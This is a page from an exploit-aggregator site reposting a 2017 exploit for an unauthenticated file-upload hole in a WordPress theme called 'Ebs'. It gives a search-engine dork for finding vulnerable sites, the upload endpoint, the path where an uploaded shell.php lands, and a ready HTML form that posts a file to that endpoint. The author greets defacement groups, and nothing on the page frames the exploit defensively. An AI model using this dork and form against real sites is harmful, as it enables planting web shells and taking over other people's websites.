Advertisement






Wordpress Theme Ebs File Upload Vulnerability | CSRF

CVE Category Price Severity
N/A CWE-352 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2017-05-03
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017050009

Below is a copy:

Wordpress Theme Ebs File Upload Vulnerability | CSRF#################################################################################
# Wordpress Theme Ebs File Upload Vulnerability | CSRF
# Author : Berandal
# Google Dork: inurl:/wp-content/themes/ebs/
# Tested on: Win 7, Linux
# Blog : http://www.maxteroit.com/
#################################################################################

+-+-+-+-+-+-+-+-+
|B|e|r|a|n|d|a|l|
+-+-+-+-+-+-+-+-+

# [!] Exploit : http://127.0.0.1/wp-content/themes/ebs/server/php/
# [!] File Location : http://127.0.0.1/wp-content/themes/ebs/server/php/files/shell.php

#################################################################################
#[*] CSRF:
#################################################################################
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/ebs/server/php/" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>
#################################################################################
# [*] ABOUT:
#################################################################################
# Facebook: https://www.facebook.com/owlsquad.id
# Twitter: https://www.twitter.com/id_berandal
# Greetz : All Official Member OWL SQUAD - 6host Party Coder's - Alone Clown Security - and All Indonesian Defacer.
#################################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.